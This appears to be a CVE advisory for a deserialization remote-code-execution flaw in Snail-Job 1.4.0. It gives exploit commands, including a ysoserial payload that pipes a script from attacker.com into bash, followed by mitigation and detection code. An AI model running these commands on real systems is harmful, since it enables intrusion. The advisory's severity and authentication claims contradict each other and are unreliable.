Snail-Job 1.4.0, Remote Code Execution via Deserialization, CVE-2025-2622 (Critical)

How CVE-2025-2622 Works

The vulnerability exists in the `getRuntime` function within Snail-Job 1.4.0's Workflow-Task Management Module. The `nodeExpression` parameter is deserialized without adequate input validation, so an attacker who crafts a malicious serialized object and sends it to the `/snail-job/workflow/check-node-expression` endpoint gains arbitrary code execution in the application's context. The exploit leverages default Java deserialization gadgets, enabling command injection without authentication.

DailyCVE Form

Platform: Snail-Job
Version: 1.4.0
Vulnerability: RCE via Deserialization
Severity: Critical
Date: 03/26/2025

What Undercode Says:

Exploitation

1. Payload Crafting:

ysoserial -g CommonsCollections5 'curl attacker.com/shell.sh | bash' > payload.bin

2. Exploit Trigger:

curl -X POST http://target/snail-job/workflow/check-node-expression --data @payload.bin

Protection

1. Patch: Upgrade to Snail-Job 1.4.1+.

2. Mitigation:

location /snail-job/workflow/ { deny all; }

3. Input Validation:

// Naive substring check on the raw parameter; it is a heuristic only and does not replace a proper deserialization filter.
if (nodeExpression.contains("java.io.Serializable")) { throw new SecurityException(); }
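A sturdier form of the input-validation step above is to never hand the untrusted `nodeExpression` bytes to a bare `ObjectInputStream`, but to apply a JEP 290 allowlist filter (Java 9+) so that only the expected classes can be instantiated and any gadget class is rejected before its bytes are read. The following is an added example, not code from Snail-Job; the class names on the allowlist and the `readNodeExpression` helper are assumptions about what a node expression might legitimately contain.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.Date;
import java.util.HashMap;
import java.util.Map;

/**
 * Added illustration (not Snail-Job code): deserialize an untrusted
 * nodeExpression payload behind a JEP 290 allowlist filter instead of
 * a substring check on the raw parameter.
 */
public class NodeExpressionFilterDemo {

    // Allowlist (assumed for the example): only these classes are accepted;
    // "!*" rejects every other class before its bytes are read.
    // maxdepth/maxrefs/maxbytes bound the object graph so a payload cannot
    // exhaust memory even when every class in it is on the list.
    private static final ObjectInputFilter NODE_EXPRESSION_FILTER =
            ObjectInputFilter.Config.createFilter(
                    "maxdepth=8;maxrefs=256;maxbytes=65536;"
                  + "java.lang.String;java.lang.Integer;java.lang.Number;"
                  + "java.util.HashMap;java.util.ArrayList;!*");

    /** Deserialize with the filter applied; any off-list class throws InvalidClassException. */
    public static Object readNodeExpression(byte[] untrusted)
            throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(untrusted))) {
            in.setObjectInputFilter(NODE_EXPRESSION_FILTER);
            return in.readObject();
        }
    }

    /** Builds constructed sample payloads for the demo. */
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed benign input: a map of the kinds of values on the allowlist.
        Map<String, Integer> expr = new HashMap<>();
        expr.put("nodeId", 42);
        System.out.println("allowed: " + readNodeExpression(serialize(expr)));

        // Constructed off-list input: java.util.Date is Serializable but not allowed,
        // so the filter rejects it before Date.readObject ever runs.
        try {
            readNodeExpression(serialize(new Date()));
            System.out.println("unexpected: off-list class accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The filter runs for every class encountered in the stream, including nested ones, which is why it stops gadget chains that a string search on the encoded payload cannot see. If the application can express node expressions as JSON or another data-only format instead, that removes the deserialization surface entirely and is preferable to any filter.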

Detection

1. Log Analysis:

grep -r "Runtime.getRuntime()" /var/log/snail-job

2. Network Monitoring (the filter below matches TCP payloads on port 80 that begin with "PO", i.e. HTTP POST requests, by indexing past the TCP header):

tcpdump -i eth0 'port 80 and tcp[((tcp[12:1] & 0xf0) >> 2):2] = 0x504f' -w deserialization.pcap
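The captured POST bodies still need to be told apart from ordinary requests. A Java serialization stream always opens with the bytes `AC ED 00 05`, which become `rO0AB` once base64-encoded, so a reverse proxy, WAF rule or log scanner can flag a `nodeExpression` value that carries either form. This is an added example, not Snail-Job code or a rule from the advisory; the form-field layout and the sample bodies are constructed for the demo.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Base64;

/**
 * Added illustration (not Snail-Job code): flag request bodies that carry a
 * Java serialization stream, whether raw, base64-encoded, or URL-form-encoded.
 */
public class SerializedPayloadDetector {

    // Java serialization header: STREAM_MAGIC 0xACED followed by STREAM_VERSION 0x0005.
    private static final byte[] STREAM_MAGIC = {(byte) 0xAC, (byte) 0xED, 0x00, 0x05};
    // Base64 of those four bytes always starts with this prefix.
    private static final String BASE64_MAGIC = "rO0AB";

    /** True if the raw body begins with the serialization header. */
    public static boolean isRawSerialized(byte[] body) {
        return body.length >= STREAM_MAGIC.length
                && Arrays.equals(Arrays.copyOf(body, STREAM_MAGIC.length), STREAM_MAGIC);
    }

    /** True if any form field value (or the bare body) is a base64 serialization stream. */
    public static boolean containsBase64Serialized(String body) {
        for (String field : body.split("&")) {
            int eq = field.indexOf('=');
            String value = eq >= 0 ? field.substring(eq + 1) : field;
            try {
                value = URLDecoder.decode(value, StandardCharsets.UTF_8);
            } catch (IllegalArgumentException malformedEscape) {
                // Leave the value as-is; a bad %-escape is not itself a finding.
            }
            if (value.startsWith(BASE64_MAGIC)) {
                return true;
            }
        }
        return false;
    }

    /** Combined check suitable for a request filter or log-scanning job. */
    public static boolean looksLikeJavaSerialization(byte[] body) {
        return isRawSerialized(body)
                || containsBase64Serialized(new String(body, StandardCharsets.ISO_8859_1));
    }

    public static void main(String[] args) {
        // Constructed sample bodies for the demo.
        byte[] raw = {(byte) 0xAC, (byte) 0xED, 0x00, 0x05, 0x74, 0x00, 0x03, 'f', 'o', 'o'};
        String b64 = Base64.getEncoder().encodeToString(STREAM_MAGIC); // "rO0ABQ=="
        byte[] form = ("workflowId=7&nodeExpression=" + URLEncoderCompat.encode(b64))
                .getBytes(StandardCharsets.UTF_8);
        byte[] benign = "{\"nodeId\": 42, \"expr\": \"a > b\"}".getBytes(StandardCharsets.UTF_8);

        System.out.println("raw body flagged:    " + looksLikeJavaSerialization(raw));    // true
        System.out.println("form body flagged:   " + looksLikeJavaSerialization(form));   // true
        System.out.println("benign body flagged: " + looksLikeJavaSerialization(benign)); // false
    }

    /** Tiny helper so the demo form body is percent-encoded like a browser would send it. */
    static final class URLEncoderCompat {
        static String encode(String s) {
            return java.net.URLEncoder.encode(s, StandardCharsets.UTF_8);
        }
    }
}
```

Matching on the stream header catches the payload regardless of which gadget chain it carries, which is the property the `grep` for a single method name lacks. Pair the check with a log entry that records the source address and the endpoint hit, so that a flagged request against `/snail-job/workflow/check-node-expression` can be correlated with the packet capture above.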

References

Analytics:

  • CVSS 4.0: 5.3 (Medium)
  • Attack Vector: Network
  • Privileges Required: Low
  • Exploit Availability: Public

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2622
Extra Source Hub:
Undercode
